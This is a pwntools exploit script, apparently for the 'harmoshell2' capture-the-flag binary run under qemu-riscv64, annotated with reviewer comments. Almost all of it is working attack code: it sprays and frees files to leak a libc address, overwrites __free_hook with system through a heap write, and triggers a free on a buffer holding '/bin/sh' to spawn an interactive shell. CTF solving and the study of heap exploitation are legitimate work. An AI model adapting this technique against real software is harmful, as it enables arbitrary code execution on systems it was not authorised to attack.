from pwn import *

# pwntools harness for the "harmoshell2" challenge binary, run under
# qemu-riscv64 with the bundled libc.  remote_addr is an empty placeholder
# (host "", port 0) and is only consulted when is_remote is True.
# NOTE(review): the script mixes str literals ('\x00', 'B'*8) with the bytes
# that pwntools' rv()/p64() return, which only works under Python 2 pwntools;
# on Python 3 those concatenations and ljust() calls raise TypeError -- confirm
# the intended interpreter before running.
remote_addr=['',0]
is_remote = False
elf_path = "./harmoshell2"
elf = ELF(elf_path)
libc = ELF("./libs/lib/libc-2.27.so")
context.terminal = ["tmux", "new-window"]

# Either attach to the configured remote endpoint or launch the binary locally
# through qemu-user (with the ./libs sysroot and ASLR enabled in the guest).
if is_remote:
    p=remote(remote_addr[0],remote_addr[1])
else:
    p = process(["qemu-riscv64", "-L", "./libs", elf_path], aslr = True)

# Short aliases for the tube I/O primitives (sl/sa are defined but unused).
ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)

def lg(s,addr = None):
    # Coloured logger: with an address prints "[+] label --> 0x...", otherwise
    # prints "[-] label".  Note that addr == 0 takes the "no address" branch.
    if addr:
        print('\033[1;31;40m[+] %-15s --> 0x%8x\033[0m'%(s,addr))
    else:
        print('\033[1;32;40m[-] %-20s \033[0m'%(s))

def raddr(a=6):
    # Read a little-endian address from the tube: `a` raw bytes when a == 6,
    # otherwise a whole line with the trailing newline stripped; the value is
    # zero-padded to 8 bytes before u64().  Defined but not called below.
    if(a==6):
        return u64(rv(a).ljust(8,'\x00'))
    else:
        return u64(rl().strip('\n').ljust(8,'\x00'))

def choice(idx):
    # Wait for the shell prompt "$ " and send one command line.
    sla("$ ", str(idx))

def touchfile(filename):
    # Issue `touch <filename>` to the challenge shell.
    choice("touch " + filename)

def echo(filename, content, is_append = False):
    # Issue `echo > <filename>` (or `echo >> <filename>` when is_append is set)
    # and then send the file content as raw bytes.  The 1 s sleep gives the
    # target time to switch into content-reading mode before the payload is
    # sent; removing it changes the interaction timing.
    # NOTE(review): `is_append == True` behaves like `if is_append:` here.
    if is_append == True:
        choice("echo >> " + filename)
    else:
        choice("echo > " + filename)
    sleep(1)
    sn(content)

def rm(filename):
    # Issue `rm <filename>` to the challenge shell.
    choice("rm " + filename)

def show(filename):
    # Issue `cat <filename>` and consume output up to the "Content: " marker,
    # leaving the file body for the caller to read.
    choice("cat " + filename)
    ru("Content: ")

if __name__ == '__main__':
    # The whole sequence is order-sensitive: every helper synchronises on the
    # "$ " prompt, so the statements below must not be reordered.
    # Create 20 files named B0..B13 (hex suffix), remove them all, then
    # recreate the first 8.
    for i in range(20):
        touchfile('B' + hex(i)[2:])
    for i in range(20):
        rm('B' + hex(i)[2:])
    for i in range(8):
        touchfile('B' + hex(i)[2:])
    # Read back B7; the leaked line is zero-padded to 8 bytes and adjusted by
    # fixed offsets that are tied to this libc build and qemu setup (not
    # derived here -- verify against the target if anything is changed).
    show('B7')
    libc_addr = u64(rl().strip().ljust(8, '\x00')) + 0x4000000000 - 0x1079f8
    lg("libc", libc_addr)
    libc.address = libc_addr
    # Remaining writes use libc symbol addresses computed from the leak above;
    # the heap layout they depend on is not visible from this script and is
    # specific to the challenge binary.
    echo("B2", '/bin/sh\x00' + "A"*0xf8)
    echo("B2", p64(0)*2 + 'B'*8 + p64(0) + p64(libc.symbols['__free_hook']), True)
    echo('B'*8, p64(libc.symbols['system']))
    rm('B2')
    p.interactive()